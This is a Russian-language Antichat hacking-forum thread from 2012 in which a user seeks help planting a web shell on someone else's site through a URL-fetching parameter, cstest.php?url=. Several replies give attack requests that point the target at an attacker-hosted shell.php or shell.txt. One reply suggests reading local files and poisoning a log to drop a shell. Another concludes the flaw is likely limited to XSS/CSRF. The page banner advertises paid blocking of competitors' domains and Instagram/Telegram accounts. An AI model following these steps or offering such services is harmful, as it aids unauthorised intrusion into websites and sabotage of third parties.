УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Нужна помощь с заливкой shell'a

Опции темы

Поиск в этой теме

Опции просмотра

23.07.2012, 15:41

StormAttack

Guest

Сообщений: n/a

Провел на форуме:
55662

Репутация: -1

Есть сайт: https://site.com/cstest.php?url=

Eсли дописать ссылку https://site.com/cstest.php?url=http://site.ru/shell.php - то на сайте выводиться shell с моим сайтом.

Вопрос: можно ли залить Shell на сайт "https://site.com" ?

23.07.2012, 15:50

xxddz

Новичок

Регистрация: 02.10.2009

Сообщений: 2

Провел на форуме:
179263

Репутация: 0

Попробуй

https://site.com/cstest.php?url=http://site.ru/shell.txt

23.07.2012, 15:58

StormAttack

Guest

Сообщений: n/a

Провел на форуме:
55662

Репутация: -1

не прокатило...

вот что выбило:

Цитата:

Сообщение от None

posting to url: http://site.com/shell.txt
Array (

Код:

Code:
=> 200 [body] => [header] => HTTP/1.1 200 OK Date: Mon, 23 Jul 2012 10:50:33 GMT Server: LiteSpeed Accept-Ranges: bytes Connection: close ETag: "3870-500d2bf7-0" Last-Modified: Mon, 23 Jul 2012 10:48:23 GMT Content-Type: text/plain Content-Length: 14448 )

Код:

[/QUOTE]
[/CODE]

[/QUOTE]

23.07.2012, 15:58

Chrome~

Постоянный

Регистрация: 13.12.2008

Сообщений: 354

Провел на форуме:
1747641

Репутация: 175

Отправить сообщение для Chrome~ с помощью ICQ

Цитата:

Сообщение от xxddz

xxddz said:
Попробуй
https://site.com/cstest.php?url=http://site.ru/shell.txt

Нет, это не поможет, так как судя по словам из первого поста, на сайте скорее всего создается страница, которая содержит iframe со ссылкой на url.

Цитата:

Сообщение от StormAttack

StormAttack said:
не прокатило...
вот что выбило:

Хотя не iframe, скорее всего, а сайт просто пытается скачать и вывести страницу, которая передается в параметре url.

23.07.2012, 16:01

человек-паук

Guest

Сообщений: n/a

Провел на форуме:
416

Репутация: 0

если через cstest.php?url= можно читать локальные файлы, пробуй найти лог-файл и отправить на сервер пакет с шеллом

23.07.2012, 16:02

StormAttack

Guest

Сообщений: n/a

Провел на форуме:
55662

Репутация: -1

Цитата:

Сообщение от Chrome~

Chrome~ said:
Нет, это не поможет, так как судя по словам из первого поста, на сайте скорее всего создается страница, которая содержит iframe со ссылкой на url.

это не iframe, это форма с полями URL и FORM Body

23.07.2012, 16:06

StormAttack

Guest

Сообщений: n/a

Провел на форуме:
55662

Репутация: -1

Цитата:

Сообщение от человек-паук

человек-паук said:
если через cstest.php?url= можно читать локальные файлы, пробуй найти лог-файл и отправить на сервер пакет с шеллом

локальные файлы не читает

Цитата:

Сообщение от None

0Array (

Код:

Code:
=> 0 [body] => Couldn't resolve host 'whatwedo.php' )

Код:

[/QUOTE]
[/CODE]

[/QUOTE]

23.07.2012, 16:07

Chrome~

Постоянный

Регистрация: 13.12.2008

Сообщений: 354

Провел на форуме:
1747641

Репутация: 175

Цитата:

Сообщение от StormAttack

StormAttack said:
это не iframe, это форма с полями URL и FORM Body

Я понимаю, но страница, которая выводится после отправки формы, может содержать iframe, или же как я написал выше - содержимое скачанного файла.

Цитата:

Сообщение от StormAttack

StormAttack said:
локальные файлы не читает

Тогда все ясно. Скрипт просто обращается к странице url, скачивает ее, и выводит на экран. Это можно использовать максимум для XSS/CSRF атаки, но только при условии, что страница выведется как html документ, а не чистый текст.

23.07.2012, 16:11

StormAttack

Guest

Сообщений: n/a

Провел на форуме:
55662

Репутация: -1

Цитата:

Сообщение от Chrome~

Chrome~ said:
Я понимаю, но страница, которая выводится после отправки формы, может содержать iframe, или же как я написал выше - содержимое скачанного файла.
Тогда все ясно. Скрипт просто обращается к странице url, скачивает ее, и выводит на экран. Это можно использовать максимум для XSS/CSRF атаки, но только при условии, что страница выведется как html документ, а не чистый текст.

Понятно, спасибо.

#10

02.08.2012, 10:07

totenkopf

Guest

Сообщений: n/a

Провел на форуме:
33658

Репутация: 19

Цитата:

Сообщение от None

0Array (

Код:

Code:
=> 0 [body] => Couldn't resolve host 'whatwedo.php' )

Код:

 

А чего он пытается его отрезолвить как хост?
Запрос покажи.

[/QUOTE]

А чего он пытается его отрезолвить как хост?
Запрос покажи.
[/CODE]

[/QUOTE]

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход